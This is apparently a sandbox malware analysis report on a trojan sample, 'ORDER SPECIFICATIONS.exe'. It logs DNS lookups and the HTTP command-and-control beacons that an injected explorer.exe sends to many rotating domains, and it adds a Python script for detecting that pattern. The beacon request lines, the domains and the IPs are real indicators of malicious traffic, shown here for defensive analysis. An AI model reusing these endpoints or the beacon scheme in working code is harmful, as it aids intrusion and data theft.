Feb 23, 2021 08:58:01.037513971 CET | 8.8.8.8 | 192.168.2.5 | 0x6f16 | No error (0) | www.hostsnc.com | - | 156.240.32.114 | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:06.592775106 CET | 8.8.8.8 | 192.168.2.5 | 0xadb4 | No error (0) | www.assemble-4u.com | assemble-4u.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 08:58:06.592775106 CET | 8.8.8.8 | 192.168.2.5 | 0xadb4 | No error (0) | assemble-4u.com | - | 13.57.130.120 | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:12.074486971 CET | 8.8.8.8 | 192.168.2.5 | 0x756c | No error (0) | www.raphaelyejesiel.com | - | 54.85.86.211 | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:17.563788891 CET | 8.8.8.8 | 192.168.2.5 | 0x4002 | No error (0) | www.your-new-body-plan.com | - | 34.90.54.238 | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:22.772489071 CET | 8.8.8.8 | 192.168.2.5 | 0x6611 | No error (0) | www.softwaresreports.info | softwaresreports.info | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 08:58:22.772489071 CET | 8.8.8.8 | 192.168.2.5 | 0x6611 | No error (0) | softwaresreports.info | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:28.023690939 CET | 8.8.8.8 | 192.168.2.5 | 0x1d8b | Name error (3) | www.gdzas08.cloud | none | none | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:33.297590971 CET | 8.8.8.8 | 192.168.2.5 | 0x90d5 | No error (0) | www.athomecp.com | - | 154.91.61.105 | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:54.816216946 CET | 8.8.8.8 | 192.168.2.5 | 0x5ac6 | No error (0) | www.athomecp.com | - | 154.91.61.105 | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:59.422525883 CET | 8.8.8.8 | 192.168.2.5 | 0x70be | No error (0) | www.shamansmoke.com | shaman-smoke.myshopify.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 08:58:59.422525883 CET | 8.8.8.8 | 192.168.2.5 | 0x70be | No error (0) | shaman-smoke.myshopify.com | shops.myshopify.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 08:58:59.422525883 CET | 8.8.8.8 | 192.168.2.5 | 0x70be | No error (0) | shops.myshopify.com | - | 23.227.38.74 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.abaplants.com
• www.cyjulebu.com
• www.denisekohli.com
• www.hostsnc.com
• www.assemble-4u.com
• www.raphaelyejesiel.com
• www.your-new-body-plan.com
• www.softwaresreports.info
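
The DNS Queries table above and the HTTP sessions listed under HTTP Packets below show a single process, C:\Windows\explorer.exe, sending GET requests with the same path (/owws/) and the same two parameter names (FZA, GzrX) to a series of unrelated hosts, with the A query for each host issued roughly 5.5 seconds after the previous one and most hosts answering with generic 403/404/500 pages. The script below is an added example, not part of the sandbox report or of Joe Sandbox's own tooling: it turns those observations into three checks over records copied from the report's tables (URI-skeleton fan-out per process, distinct names resolved per minute, and query cadence). The chrome.exe control request, its executable path, the 60-second window and the thresholds are assumptions chosen for illustration.

```python
"""Added example (not from the sandbox report): flag the C2 pattern these tables
show, i.e. one process sending GETs with an identical URI skeleton to many
unrelated hosts, preceded by A queries for those hosts at a steady cadence.
Records are copied from the report's DNS Queries and HTTP Packets tables; the
single chrome.exe request is a constructed benign control."""
from collections import defaultdict
from datetime import datetime
from statistics import median
from urllib.parse import parse_qsl, urlsplit

TS_FMT = "%b %d, %Y %H:%M:%S.%f"

# (timestamp, queried name), copied from the DNS Queries table.
DNS_QUERIES = [
    ("Feb 23, 2021 08:57:43.926274061 CET", "www.abaplants.com"),
    ("Feb 23, 2021 08:57:49.474215031 CET", "www.cyjulebu.com"),
    ("Feb 23, 2021 08:57:55.522838116 CET", "www.denisekohli.com"),
    ("Feb 23, 2021 08:58:00.814778090 CET", "www.hostsnc.com"),
    ("Feb 23, 2021 08:58:06.523142099 CET", "www.assemble-4u.com"),
    ("Feb 23, 2021 08:58:12.012454987 CET", "www.raphaelyejesiel.com"),
    ("Feb 23, 2021 08:58:17.494049072 CET", "www.your-new-body-plan.com"),
    ("Feb 23, 2021 08:58:22.681061029 CET", "www.softwaresreports.info"),
    ("Feb 23, 2021 08:58:27.961551905 CET", "www.gdzas08.cloud"),
    ("Feb 23, 2021 08:58:33.085443974 CET", "www.athomecp.com"),
    ("Feb 23, 2021 08:58:54.751465082 CET", "www.athomecp.com"),
    ("Feb 23, 2021 08:58:59.339791059 CET", "www.shamansmoke.com"),
]

# (timestamp, process, Host header, request line) from HTTP sessions 0-3,
# plus one constructed benign request (assumed browser path) as a control.
HTTP_REQUESTS = [
    ("Feb 23, 2021 08:57:44.267937899 CET", r"C:\Windows\explorer.exe", "www.abaplants.com",
     "GET /owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src HTTP/1.1"),
    ("Feb 23, 2021 08:57:50.307199955 CET", r"C:\Windows\explorer.exe", "www.cyjulebu.com",
     "GET /owws/?FZA=LNtcZ4o3RSbiM3q1XP5+3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src HTTP/1.1"),
    ("Feb 23, 2021 08:57:55.635871887 CET", r"C:\Windows\explorer.exe", "www.denisekohli.com",
     "GET /owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src HTTP/1.1"),
    ("Feb 23, 2021 08:58:01.264838934 CET", r"C:\Windows\explorer.exe", "www.hostsnc.com",
     "GET /owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src HTTP/1.1"),
    ("Feb 23, 2021 08:58:03.000000000 CET", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "www.example.com", "GET /index.html HTTP/1.1"),  # constructed control, not in the report
]


def parse_ts(stamp: str) -> datetime:
    """Sandbox stamps carry nanoseconds and a zone label; datetime parses microseconds at most."""
    head, frac = stamp.replace(" CET", "").rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", TS_FMT)


def uri_skeleton(request_line: str) -> tuple:
    """Reduce 'GET /owws/?FZA=<blob>&GzrX=Bxo0src HTTP/1.1' to (method, path, parameter names)."""
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    names = tuple(k for k, _ in parse_qsl(parts.query, keep_blank_values=True))
    return (method, parts.path, names)


def beacon_clusters(requests, min_hosts: int = 3) -> dict:
    """Group requests by (process, skeleton); keep groups fanning out to >= min_hosts distinct hosts."""
    hosts_by_key = defaultdict(set)
    for _ts, process, host, line in requests:
        hosts_by_key[(process, uri_skeleton(line))].add(host.lower())
    return {key: sorted(hosts) for key, hosts in hosts_by_key.items() if len(hosts) >= min_hosts}


def max_distinct_in_window(queries, window_s: float = 60.0) -> int:
    """Largest number of distinct names resolved within any window_s-second span."""
    events = sorted((parse_ts(ts), name.lower()) for ts, name in queries)
    best = 0
    for i, (start, _name) in enumerate(events):
        in_window = {n for t, n in events[i:] if (t - start).total_seconds() <= window_s}
        best = max(best, len(in_window))
    return best


def query_cadence(queries):
    """Median gap between consecutive queries and the largest deviation from it, in seconds."""
    times = sorted(parse_ts(ts) for ts, _name in queries)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    med = median(gaps)
    return med, max(abs(g - med) for g in gaps)


def assess(requests, queries) -> dict:
    """Combine the three signals into one verdict; thresholds are illustrative assumptions."""
    clusters = beacon_clusters(requests)
    fanout = max_distinct_in_window(queries)
    med, jitter = query_cadence(queries)
    return {
        "beacon_clusters": clusters,
        "distinct_names_per_minute": fanout,
        "median_gap_s": round(med, 2),
        "max_gap_deviation_s": round(jitter, 2),
        "suspicious": bool(clusters) and fanout >= 5,
    }


if __name__ == "__main__":
    for key, value in assess(HTTP_REQUESTS, DNS_QUERIES).items():
        print(f"{key}: {value}")
```

Response codes are deliberately left out of the verdict: of the four sessions shown first, only www.hostsnc.com answered 200, so a rule keyed on successful responses would have seen one host rather than the rotation. The requests also carry nothing but Host and Connection headers; a proxy rule on a missing User-Agent is a cheap companion check, but it is not part of this example because it adds nothing the Data column does not already make obvious.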

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49729 | 50.87.196.120 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 08:57:44.267937899 CET | 3076 | OUT | GET /owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src HTTP/1.1
Host: www.abaplants.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 08:57:44.464051008 CET | 4548 | IN | HTTP/1.1 500 Internal Server Error
Date: Tue, 23 Feb 2021 07:57:44 GMT
Server: Apache
Content-Length: 685
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 61 62 61 70 6c 61 6e 74 73 2e 61 62 61 62 65 61 75 74 79 74 72 61 69 6e 69 6e 67 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 
44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@abaplants.ababeautytraining.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49730 | 170.106.171.56 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 08:57:50.307199955 CET | 5447 | OUT | GET /owws/?FZA=LNtcZ4o3RSbiM3q1XP5+3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src HTTP/1.1
Host: www.cyjulebu.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 08:57:50.513550997 CET | 5449 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 23 Feb 2021 07:57:48 GMT
Content-Type: text/html
Content-Length: 1039
Connection: close
Set-Cookie: security_session_verify=9ebc6a29fa9e7c317eed3150247f3800; expires=Fri, 26-Feb-21 15:57:48 GMT; path=/; HttpOnly
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 6e 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6c 6f 73 65 22 2f 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 73 74 72 69 6e 67 54 6f 48 65 78 28 73 74 72 29 7b 76 61 72 20 76 61 6c 3d 22 22 3b 66 6f 72 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 73 74 72 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 7b 69 66 28 76 61 6c 20 3d 3d 20 22 22 29 76 61 6c 20 3d 20 73 74 72 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 65 6c 73 65 20 76 61 6c 20 2b 3d 20 73 74 72 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 7d 72 65 74 75 72 6e 20 76 61 6c 3b 7d 66 75 6e 63 74 69 6f 6e 20 59 75 6e 53 75 6f 41 75 74 6f 4a 75 6d 70 28 29 7b 20 76 61 72 20 77 69 64 74 68 20 3d 73 63 72 65 65 6e 2e 77 69 64 74 68 3b 20 76 61 72 20 68 65 69 67 68 74 3d 73 63 72 65 65 6e 2e 68 65 69 67 68 74 3b 20 76 61 72 20 73 63 72 65 65 6e 64 61 74 65 20 3d 20 77 69 64 74 68 20 2b 20 22 2c 22 20 2b 20 68 65 69 67 68 74 3b 76 61 72 20 63 75 72 6c 6f 63 61 74 69 6f 6e 20 3d 20 77 69 6e 64 
6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 69 66 28 2d 31 20 3d 3d 20 63 75 72 6c 6f 63 61 74 69 6f 6e 2e 69 6e 64 65 78 4f 66 28 22 73 65 63 75 72 69 74 79 5f 76 65 72 69 66 79 5f 22 29 29 7b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 22 73 72 63 75 72 6c 3d 22 20 2b 20 73 74 72 69 6e 67 54 6f 48 65 78 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 20 2b 20 22 3b 70 61 74 68 3d 2f 3b 22 3b 7d 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 20 3d 20 22 2f 6f 77 77 73 2f 3f 46 5a 41 3d 4c 4e 74 63 5a 34 6f 33 52 53 62 69 4d 33 71 31 58 50 35 20 33 71 50 58 78 46 64 57 43 51 4c 38 46 56 7a 65 68 44 68 7a 54 65 31 68 35 39 73 6a 7a 61 76 6b 73 77 4c 48 4d 72 4f 53 4e 32 57 52 79 4c 76 50 26 47 7a 72 58 3d 42 78 6f 30 73 72 63 26 73 65 63 75 72 69 74 79 5f 76 65 72 69 66 79 5f 64 61 74 61 3d 22 20 2b 20 73 74 72 69 6e 67 54 6f 48 65 78 28 73 63 72 65 65 6e 64 61 74 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 73 65 74 54 69 6d 65 6f 75 74 28 22 59 75 6e 53 75 6f 41 75 74 6f 4a 75 6d 70 28 29 22 2c 20 35 30 29 3b
                                                                                      Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, post-check=0, pre-check=0"/><meta http-equiv="Connection" content="Close"/><script type="text/javascript">function stringToHex(str){var val="";for(var i = 0; i < str.length; i++){if(val == "")val = str.charCodeAt(i).toString(16);else val += str.charCodeAt(i).toString(16);}return val;}function YunSuoAutoJump(){ var width =screen.width; var height=screen.height; var screendate = width + "," + height;var curlocation = window.location.href;if(-1 == curlocation.indexOf("security_verify_")){ document.cookie="srcurl=" + stringToHex(window.location.href) + ";path=/;";}self.location = "/owws/?FZA=LNtcZ4o3RSbiM3q1XP5 3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src&security_verify_data=" + stringToHex(screendate);}</script><script>setTimeout("YunSuoAutoJump()", 50);


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49731 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 08:57:55.635871887 CET | 5450 | OUT | GET /owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src HTTP/1.1
Host: www.denisekohli.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 08:57:55.775059938 CET | 5450 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Tue, 23 Feb 2021 07:57:55 GMT
Content-Type: text/html
Content-Length: 275
ETag: "603155b8-113"
Via: 1.1 google
Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49732 | 156.240.32.114 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 08:58:01.264838934 CET | 5451 | OUT | GET /owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src HTTP/1.1
                                                                                      Host: www.hostsnc.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Feb 23, 2021 08:58:01.486218929 CET | 5451 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Tue, 23 Feb 2021 07:57:09 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49734 | 13.57.130.120 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 08:58:06.798021078 CET | 5488 | OUT | GET /owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src HTTP/1.1
                                                                                      Host: www.assemble-4u.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Feb 23, 2021 08:58:07.001431942 CET | 5489 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Date: Tue, 23 Feb 2021 07:58:06 GMT
                                                                                      Server: Apache
                                                                                      Location: https://www.assemble-4u.com/owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src
                                                                                      Content-Length: 331
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.assemble-4u.com/owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&amp;GzrX=Bxo0src">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.5 | 49735 | 54.85.86.211 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 08:58:12.204418898 CET | 5490 | OUT | GET /owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src HTTP/1.1
                                                                                      Host: www.raphaelyejesiel.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Feb 23, 2021 08:58:12.338124037 CET | 5491 | IN | HTTP/1.1 200 OK
                                                                                      Date: Tue, 23 Feb 2021 07:58:12 GMT
                                                                                      Server: Apache
                                                                                      Set-Cookie: session=gshim4iannpbkjt0e93p1h8qjd; path=/; domain=.raphaelyejesiel.com; secure; SameSite=None
                                                                                      Vary: Accept-Encoding,User-Agent
                                                                                      Connection: close
                                                                                      Transfer-Encoding: chunked
                                                                                      Content-Type: text/html; charset=utf-8
Data Ascii: 73c3<!DOCTYPE html><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="//sistema.casar.com/favicon.ico?v=2" /><title>Página não encontrada | Casar.com</title><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="google-site-verification" content="GMxtmDWiAOv-Su4z9-sUAyJJNUGtlhyVBMuBa3C1fqs" /><script src="https://embed.typeform.com/embed.js"></script>... HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->...[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script><![endif]-->... open graph --> <meta property="og:site_name" content="Casar.com"/> <meta property="og:type" content="website"> <meta property="fb:app_id" content="621352837957736"/>... end open graph --> ... google analytics --><script> (function(i,s,o,g,r,a,m){i['GoogleAnaly


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.5 | 49736 | 34.90.54.238 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 08:58:17.613405943 CET | 5522 | OUT | GET /owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src HTTP/1.1
                                                                                      Host: www.your-new-body-plan.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Feb 23, 2021 08:58:17.661597013 CET | 5522 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx
                                                                                      Date: Tue, 23 Feb 2021 07:58:17 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 162
                                                                                      Connection: close
                                                                                      Location: https://www.your-new-body-plan.com/owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src
                                                                                      Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                      X-HTTPS-Enforce: 1
                                                                                      X-Proxy-Cache-Info: DT:1
                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.5 | 49737 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 08:58:22.815170050 CET | 5524 | OUT | GET /owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src HTTP/1.1
                                                                                      Host: www.softwaresreports.info
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Feb 23, 2021 08:58:22.954349995 CET | 5524 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Tue, 23 Feb 2021 07:58:22 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "603155b8-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      Behavior

                                                                                      System Behavior

                                                                                      General

                                                                                      Start time:08:56:47
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
                                                                                      Imagebase:0x6a0000
                                                                                      File size:552448 bytes
                                                                                      MD5 hash:E75A4DF51162401B21C3EB79718FB3DB
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
